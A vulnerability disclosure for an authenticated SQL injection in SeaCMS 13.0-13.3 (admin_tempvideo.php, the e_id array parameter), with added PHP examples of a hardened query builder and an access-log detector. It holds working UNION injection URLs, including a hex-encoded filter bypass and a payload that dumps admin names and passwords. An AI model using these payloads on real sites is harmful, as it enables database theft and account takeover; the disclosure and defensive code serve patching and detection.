SeaCMS V13.3 has a SQL injection vulnerability in the backend that allows an authenticated attacker to read data from the database.
Download: https://www.seacms.com/download/
*Affected versions: 13.0-13.3*
Demo Version: 13.3
Open the backend file admin_tempvideo.php.
Looking at the included config file, parameters can be passed in from the request.
Set action=import.
e_id controls the ids, so the parameter is attacker-controllable.
Then follow the execution of the SQL statement to see whether there are any restrictions.
There are none here.
The developer left a comment here that there is a safety check, so check whether the value of safeCheck is true or false.
Looking further up, we find that safeCheck is assigned true when the sql object is initialized.
However, the included config file assigns safeCheck to false.
So when admin_tempvideo.php calls the sql object from config.php, the value changes from false to true, and the parameters are not filtered.
The SQL statement can therefore be constructed. $e_id goes through implode(), which is bypassed by passing an array.
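The following is an added example, not SeaCMS's own code. It reconstructs the pattern the write-up describes (a filter that only handles string values, followed by implode() on $e_id, so an array slips past the filter) and puts a hardened version next to it. The filter's behaviour, the table name video_tmp and the function names are assumptions made for illustration.

```php
<?php
// Added example (not SeaCMS code). Reconstructs the pattern described in the
// write-up: a request-level filter that only touches string values, followed by
// implode() on $e_id, so an array bypasses the filter. Table and function names
// are hypothetical.

// Assumed filter: removes quote characters from strings, leaves arrays untouched.
function string_only_filter($value)
{
    return is_string($value) ? str_replace(["'", '"'], '', $value) : $value;
}

// Vulnerable pattern: array elements are never filtered, and implode()
// pastes them unchanged into the IN (...) clause.
function build_import_sql_vulnerable($e_id): string
{
    $e_id = string_only_filter($e_id);
    $ids  = is_array($e_id) ? implode(',', $e_id) : (string) $e_id;
    return "SELECT * FROM video_tmp WHERE id IN ($ids)";
}

// Hardened pattern: accept scalar or array input, keep only positive whole
// numbers, and bind them as parameters so no request text reaches the SQL.
function build_import_sql_hardened($e_id): ?array
{
    $ids = [];
    foreach ((array) $e_id as $v) {
        // filter_var rejects nested arrays and anything that is not an integer
        $n = is_scalar($v) ? filter_var($v, FILTER_VALIDATE_INT) : false;
        if ($n !== false && $n > 0) {
            $ids[] = $n;
        }
    }
    if ($ids === []) {
        return null; // nothing valid to import; the caller should return an error
    }
    $placeholders = implode(',', array_fill(0, count($ids), '?'));
    return ["SELECT * FROM video_tmp WHERE id IN ($placeholders)", $ids];
}

// Demo with a constructed request value of the shape used in the write-up.
$request_e_id = ['-1)union select 1,2,3#'];

// The vulnerable builder emits the injected text verbatim.
echo build_import_sql_vulnerable($request_e_id), PHP_EOL;

// The hardened builder drops the non-integer value and returns null.
var_dump(build_import_sql_hardened($request_e_id));

// With valid ids the hardened builder returns a parameterised query.
[$sql, $params] = build_import_sql_hardened(['12', '7']);
echo $sql, PHP_EOL;
// $pdo->prepare($sql)->execute($params);  // with a real PDO connection
```

The point of the hardened version is that it does not rely on a global safeCheck flag at all: the id list is validated at the point of use, every element is cast to an integer, and the values are bound rather than concatenated, so the implode() result can only ever contain placeholders.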
/9k8q3d/admin_tempvideo.php?action=import&e_id[]=-1)union+select+1,2,3,4,5,6,7,8,10,11,12,13,14,15,16,17%23&type=111
The result is echoed here.
Modify the data in column 3 and execute:
The echo succeeded, so proceed:
Payload:
/9k8q3d/admin_tempvideo.php?action=import&e_id[]=-1)union+select+1,2,(select+group_concat(schema_name)+from+information_schema.schemata),4,5,6,7,8,10,11,12,13,14,15,16,17%23&type=111
I found that there was no echo, which should be an error.
I printed the SQL statement at the execution point and found that ' and " had been removed.
So I used encoding to bypass it.
Payload:
/9k8q3d/admin_tempvideo.php?action=import&e_id[]=-1)union+select+1,2,(select+group_concat(table_name)+from+information_schema.tables+where+table_schema=0x736561636D73312E33),4,5,6,7,8,10,11,12,13,14,15,16,17%23&type=111
Payload:
/9k8q3d/admin_tempvideo.php?action=import&e_id[]=-1)union+select+1,2,(select+group_concat(name,0x3a,password)+from+sea_admin),4,5,6,7,8,10,11,12,13,14,15,16,17%23&type=111
From here, all data in the database can be obtained.
This version is SeaCMS 13.3.
Testing version 13.0 gives the same result, so 13.0 has the same vulnerability.
Therefore, affected versions: *13.0-13.3*.
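As an added example (not part of the original report or of SeaCMS), here is a small check that can be run over web-server access logs to spot the request shape described above: array-form e_id values sent to admin_tempvideo.php that are not plain integers. The log lines are constructed for the example, and the assumption that legitimate requests only ever send integer ids is mine.

```php
<?php
// Added example (not SeaCMS code): a log check for the request shape described
// in this write-up, namely array-form e_id values on admin_tempvideo.php that
// are not plain integers. The log lines below are constructed, not real traffic.
// Requires PHP 8 for str_ends_with().

const SAMPLE_LOG = [
    '203.0.113.5 - - [10/May/2024:10:01:02 +0000] "GET /9k8q3d/admin_tempvideo.php?action=import&e_id[]=12&type=1 HTTP/1.1" 200 512',
    '203.0.113.5 - - [10/May/2024:10:01:09 +0000] "GET /9k8q3d/admin_tempvideo.php?action=import&e_id[]=-1)union+select+1,2,3%23&type=111 HTTP/1.1" 200 1880',
    '198.51.100.7 - - [10/May/2024:10:02:00 +0000] "GET /index.php HTTP/1.1" 200 3000',
];

// Returns null for a benign line, or an array describing why it was flagged.
function check_request_line(string $line): ?array
{
    if (!preg_match('/"(?:GET|POST) (\S+) HTTP\//', $line, $m)) {
        return null; // not a request line this check understands
    }
    $url  = $m[1];
    $path = parse_url($url, PHP_URL_PATH) ?? '';
    if (!str_ends_with($path, '/admin_tempvideo.php')) {
        return null;
    }
    // parse_str decodes the query and turns e_id[] into a PHP array,
    // exactly as PHP does for $_GET on the server side.
    parse_str(parse_url($url, PHP_URL_QUERY) ?? '', $q);
    foreach ((array) ($q['e_id'] ?? []) as $v) {
        if (!is_scalar($v) || filter_var($v, FILTER_VALIDATE_INT) === false) {
            return [
                'url'    => $url,
                'reason' => 'non-integer e_id value: ' . (is_scalar($v) ? (string) $v : '(nested array)'),
            ];
        }
    }
    return null;
}

// Scans a list of log lines and returns the flagged ones with their line numbers.
function scan_log(array $lines): array
{
    $hits = [];
    foreach ($lines as $n => $line) {
        if (($hit = check_request_line($line)) !== null) {
            $hits[] = ['line' => $n + 1] + $hit;
        }
    }
    return $hits;
}

foreach (scan_log(SAMPLE_LOG) as $hit) {
    printf("line %d: %s\n  %s\n", $hit['line'], $hit['reason'], $hit['url']);
}
```

Only the second constructed line is flagged: the first sends an integer id and the third never touches admin_tempvideo.php. Because the check keys on the parameter's type and value rather than on keyword matching, it also catches variants that avoid obvious SQL words, and it can be pointed at any other backend script that takes an id list by changing the path suffix.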